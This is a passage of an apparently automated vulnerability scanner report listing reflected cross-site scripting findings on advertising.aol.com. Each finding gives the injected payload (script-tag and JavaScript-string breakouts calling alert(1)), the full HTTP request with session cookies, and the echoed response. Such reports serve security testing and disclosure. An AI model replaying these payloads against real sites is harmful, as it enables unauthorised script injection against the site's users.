Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:30:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/bff5d"><script>alert(1)</script>de78e1ca44a/1/4/1/" />
...[SNIP]...
4.46. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/1/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b02af"-alert(1)-"4c30a13b2ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b02af"-alert(1)-"4c30a13b2ad/1/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:30:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:30:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/b02af"-alert(1)-"4c30a13b2ad/1/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...
4.47. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/2/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36906"><script>alert(1)</script>d283a00d3ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /36906"><script>alert(1)</script>d283a00d3ed/2/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:24 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/36906"><script>alert(1)</script>d283a00d3ed/2/4/1/" />
...[SNIP]...
4.48. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/2/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1c7f"-alert(1)-"eb2f998d238 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b1c7f"-alert(1)-"eb2f998d238/2/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:27 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/b1c7f"-alert(1)-"eb2f998d238/2/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...
4.49. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/3/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b801f"><script>alert(1)</script>acc8dbf6e06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b801f"><script>alert(1)</script>acc8dbf6e06/3/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/b801f"><script>alert(1)</script>acc8dbf6e06/3/4/1/" />
...[SNIP]...
4.50. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/3/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e341"-alert(1)-"e57ac4cfe09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1e341"-alert(1)-"e57ac4cfe09/3/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:36 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/1e341"-alert(1)-"e57ac4cfe09/3/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...
4.51. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/4/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a144a"-alert(1)-"ae544fdf52a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a144a"-alert(1)-"ae544fdf52a/4/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/a144a"-alert(1)-"ae544fdf52a/4/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...
4.52. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/4/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbabf"><script>alert(1)</script>320792b55e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bbabf"><script>alert(1)</script>320792b55e6/4/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:39 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/bbabf"><script>alert(1)</script>320792b55e6/4/4/1/" />
...[SNIP]...
4.53. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/5/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ecd"><script>alert(1)</script>bbbae57115 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d3ecd"><script>alert(1)</script>bbbae57115/5/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/d3ecd"><script>alert(1)</script>bbbae57115/5/4/1/" />
...[SNIP]...
4.54. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/5/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2375"-alert(1)-"00b229b1262 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e2375"-alert(1)-"00b229b1262/5/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e2375"-alert(1)-"00b229b1262/5/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...
4.55. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/6/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8368"><script>alert(1)</script>f05492a9878 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c8368"><script>alert(1)</script>f05492a9878/6/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:46 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/c8368"><script>alert(1)</script>f05492a9878/6/4/1/" />
...[SNIP]...
4.56. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/6/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1111f"-alert(1)-"0965b770745 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1111f"-alert(1)-"0965b770745/6/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/1111f"-alert(1)-"0965b770745/6/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...
4.57. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/7/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d8b9"-alert(1)-"6eecb609471 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /3d8b9"-alert(1)-"6eecb609471/7/4/1/ HTTP/1.1
Host: advertising.aol.com
